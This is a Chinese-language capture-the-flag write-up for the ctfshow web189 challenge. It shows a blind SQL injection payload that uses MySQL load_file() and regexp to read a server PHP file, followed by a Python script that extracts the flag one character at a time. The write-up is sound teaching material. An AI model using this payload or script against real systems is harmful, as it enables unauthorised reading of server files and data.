[PHP知识库] 【ctfshow】- web189

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> PHP知识库 -> 【ctfshow】- web189 -> 正文阅读

[PHP知识库]【ctfshow】- web189

select pass from ctfshow_user where username = if(load_file('/var/www/html/api/index.php')regexp('ctfshow'),0,1)
username = 0 返回密码错误，说明存在该用户
username = 1 返回查询失败

在这里插入图片描述

import requests
import sys
flag="ctfshow{"
url="http://9402b96a-bff0-480e-8e33-86347958c901.chall.ctf.show:8080/api/index.php"
letter="0123456789abcdefghijklmnopqrstuvwxyz-{}"
for i in range(100):
    for j in letter:
        data={
            'username':"if(load_file('/var/www/html/api/index.php')regexp('{}'),0,1)".format(flag+j),
            'password':0}
        res=requests.post(url=url,data=data).text
        print(res)
        if r"\u5bc6\u7801\u9519\u8bef" in res: 
            flag+=j
            print(flag)
            break 
        if j=="}":
            sys.exit()

mysql load_file在数据库注入中使用